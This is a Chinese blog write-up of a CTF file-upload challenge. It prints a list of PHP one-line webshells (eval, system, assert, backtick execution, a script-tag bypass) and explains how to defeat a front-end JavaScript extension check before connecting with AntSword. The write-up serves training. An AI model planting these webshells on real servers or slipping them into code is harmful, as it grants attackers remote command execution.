CTF秀 upload1

已于 2022-11-20 16:17:30 修改
阅读量338 收藏
点赞数
分类专栏: CTF 文章标签: javascript 开发语言 ecmascript
于 2022-11-18 16:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53568983/article/details/127882154
版权

CTF秀 upload1

1.分析题目

进入题目后我们会看到有个文件上传的功能,什么功能决定什么漏洞,这题是一个文件上传漏洞

2.解题
  1. 先上传一个一句话木马看看
<?php @eval($_POST['attack']);?>

常用的PHP一句话木马:

<?php eval($_POST1);?> 
<?php if(isset($_POST['c'])){eval($_POST['c']);}?> 
<?php system($_REQUEST1);?> 
<?php ($_=@$_GET1).@$_($_POST1)?> 
<?php eval_r($_POST1)?> 
<?php @eval_r($_POST1)?>//容错代码 
<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句 
<?$_POST['c']($_POST['cc']);?> 
<?$_POST['c']($_POST['cc'],$_POST['cc'])?> 
<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O> 
<?php echo `$_GET['r']` ?> 
//绕过<?限制的一句话 
<script language="php">@eval_r($_POST[sb])</script>

在这里插入图片描述

如上图所示,当我们还没有点击上传的时候JS代码就执行了,这个时候我们不能够使用burpsuit进行绕过,只能够直接修改js代码

  • 这是html代码,可知在第一个input使用了οnchange="check();
<form enctype="multipart/form-data" id="aa" name="aaa" method="post" action="index.php"> 
<input id="upfile" name="upfile" type="file" onchange="check();"> 
<input type="submit" id="submit" value="上传" disabled=""> 
</form>
  • 分析JS代码

 

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile"); 选中第一个input
submit = document.getElementById("submit");  选中第二个input
name = upfile.value; name为上传文件名
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){ 如果文件名包含['jpg','png']就可以上传,否则不可以上传
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}


}

直接更改前端代码
在这里插入图片描述
这时候,你会发现还是不能够上传,这时候你需要换火狐浏览器
在这里插入图片描述
最后使用蚁剑连接
在这里插入图片描述
在这里插入图片描述
最后的结果

<?php
$flag="cyberpeace{fc39b82c89bba884015c99a99fd199f5}";
?>
安全天天学
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2021 N1CTF CTF 真题.zip
12-07
2021 N1CTF CTF 真题
攻防世界CTF题:upload1
Aixwei的博客
04-11 908
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)
Onlyone_1314的博客
11-23 4512
目录标题(1)把οnchange="check();去掉(2)禁用浏览器的JS脚本运行(3)Burp Suite抓包修改文件后缀名POST方法一句话木马GET方法一句话木马蚁剑连接 打开题目地址: 是一个文件上传的题目 选择一个一句话脚本上传: 前端存在JS代码校验文件类型,如果上传的文件后缀不是jpg和png,就会让上传按钮变得不使能: 要绕过前端的JS代码校验,常见的方法有: (1)把οnchange="check();去掉 可以直接把οnchange="check();去掉,这样提交文件的时候就
(文件上传upload) [极客大挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 8545
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客大挑战 2019]Upload1 ...
ACTF2020新生赛-upload1
m0_73303597的博客
12-11 380
自用
[CTF/网络安全]攻防世界 upload1 解题详析
等风来
05-24 4373
考察文件上传,具体原理及姿势不再赘述详情参考:[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集姿势在txt中写入一句话木马回显如下:该题结合蚁剑考察简单的文件上传姿势,读者可躬身实践。
ctf理论题1.pdf
10-30
收集的部分ctf理论题,希望对参加ctf遇上理论比赛时有一定的帮助。
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
WEB漏洞攻防 - 文件上传漏洞 - CTF - [CTF2020 新生赛] Upload 1
易编橙 · 终身成长社群,相遇已是上上签!
09-03 407
关卡: WEB - [CTF2020 新生赛]Upload 1
CTF日常训练WriteUp之CTF靶场
最新发布
Javachichi的博客
02-11 905
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CTF--菜狗杯
m0_59022585的博客
07-09 2250
再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。
[ACTF2020 新生赛]Upload-1
V50小白
10-08 4761
小编今天又来写文章啦,距离上次写文章过了一个多月,小编前段时间太忙,好久没更新文章了。现在小编回来继续做着安全的题目,这次是一个BUUCTF平台的一到文件上传漏洞题。以下为小编为小伙伴们的解题思路:, 1、题目内容, 鼠标放在灯泡上发现存在文件上传。 2、随便上传一张图片,如下可得图片上传保存的地址,访问试试看 3、试着上传php一句话马文件,出现只能上传图片 4、Burp抓包发现,对文件格式只在前台验证好办多了,思路:先上传一张一句话马图片,抓包将图片尾缀改为php文件,发现原来
[ACTF2020 新生赛]Upload 1
qq_45972928的博客
09-29 1248
[ACTF2020 新生赛]Upload 1
[ACTF2020 新生赛]Upload1
qq_63575829的博客
09-25 97
先上传.jpg 然后抓包改为.php。报毒 加文件头GIF89a。改文件后缀名为phtml。中间灯泡可以上传文件。
CTF-菜狗杯
weixin_42901207的博客
03-10 3200
ctfshow MISC菜狗杯
CTF--2023愚人杯
m0_59022585的博客
07-11 318
使用GET方式传入index.php查看源代码页面,但页面无法直接显示,进入源代码窗口,将base64密文进行解密得到index.php源代码,获得flag。文本文件中出现大量的四句话,推测是base4加密,使用脚本翻译出密文,base4有A(4,4)=24种排列,再使用脚本列出24种明文,找到flag。进入链接没有异常,F12进入控制台,查看url地址,发现是通过GET传入,传入前经过base64加密。压缩包存在加密,010Editor查看发现文件尾有key=,判断是密码,但经过base64加密,
CTF--年CTF
m0_59022585的博客
07-11 109
打开链接对PHP代码分析,使year=2022.时,==判断前先转换成字符串型判断为真,year+1后为浮点型,!==判断也为真,得到flag。通过分析密文首部和提示可以知道使用了Rabbit(兔)加密,提示也给出了密码(2023),使用Rabbit解密得到flag。
ctf upload1
07-28
根据提供的引用内容,可以得知ctf upload1是一个CTF比赛中的一个上传功能。通过上传文件,可以执行一句话木马来获取flag。具体步骤如下: 1. 首先,需要找到一句话木马的代码。根据引用\[1\]中的内容,可以得到一句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全天天学

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值